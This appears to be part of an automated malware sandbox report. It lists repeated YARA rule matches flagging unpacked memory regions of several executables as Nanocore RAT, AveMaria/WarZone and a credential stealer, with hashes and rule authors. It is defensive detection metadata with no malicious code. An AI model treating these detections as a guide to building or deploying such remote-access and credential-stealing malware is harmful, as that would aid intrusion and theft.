      Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
